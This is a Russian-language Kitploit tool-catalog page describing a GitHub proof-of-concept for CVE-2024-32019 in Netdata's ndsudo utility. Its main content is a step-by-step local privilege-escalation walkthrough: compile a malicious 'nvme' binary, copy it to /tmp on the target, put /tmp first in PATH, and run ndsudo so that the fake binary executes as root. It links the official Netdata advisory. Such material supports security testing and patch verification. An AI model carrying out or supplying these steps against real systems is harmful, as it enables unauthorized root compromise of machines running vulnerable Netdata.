Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-32019-POC — PoC для уязвимости netdata ndsudo - CVE-2024-32019 | Kitploit
Инструменты/GitHubGitHub/azureadtrent/cve-2024-32019-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеЭксплуатация Бинарных Файлов
GitHubazureadtrent/cve-2024-32019-poc

CVE-2024-32019-POC

PoC для уязвимости netdata ndsudo - CVE-2024-32019

Репозиторий
2121 год назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Повышение привилегий через ndsudo (локальная эксплуатация Netdata)

Этот POC используется для эксплуатации уязвимой утилиты ndsudo, входящей в состав Netdata, с целью повышения локальных привилегий до root. Эксплойт работает путём внедрения вредоносного бинарника в PATH пользователя, который выдает себя за доверенную команду (nvme) и выполняется с привилегиями root через ndsudo.


Предварительные требования и допущения

  • У вас есть локальный доступ к оболочке на целевой системе.

  • Вы можете выполнить следующую команду, но она завершается ошибкой "не найдено" или подобной:

    root@kitploit:~
    ./ndsudo nvme-list
    

1. Компиляция вредоносной нагрузки

На вашей атакующей машине (или на уязвимой системе, если у нее есть компилятор) скомпилируйте бинарник (например, из файла poc.c из репозитория):

root@kitploit:~
gcc poc.c -o nvme

Этот бинарник должен быть создан так, чтобы запустить корневую оболочку или выполнить произвольные команды с привилегиями root.


2. Передача нагрузки на целевую систему

Переместите или загрузите скомпилированный бинарник nvme в каталог, доступный для записи вашим пользователем, например /tmp:

root@kitploit:~
scp nvme user@target:/tmp/
# или используйте любой доступный метод загрузки файлов

3. Подготовка нагрузки к выполнению

На целевой системе убедитесь, что бинарник является исполняемым, и добавьте его каталог в начало вашего PATH:

root@kitploit:~
chmod +x /tmp/nvme
export PATH=/tmp:$PATH

Это гарантирует, что ndsudo будет находить и выполнять ваш вредоносный nvme вместо легитимного.


4. Запуск ndsudo для выполнения вашей нагрузки

Выполните уязвимую команду для запуска ndsudo:

root@kitploit:~
./ndsudo nvme-list

Ресурсы

  • Консультация Netdata на Github: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
Скачать инструмент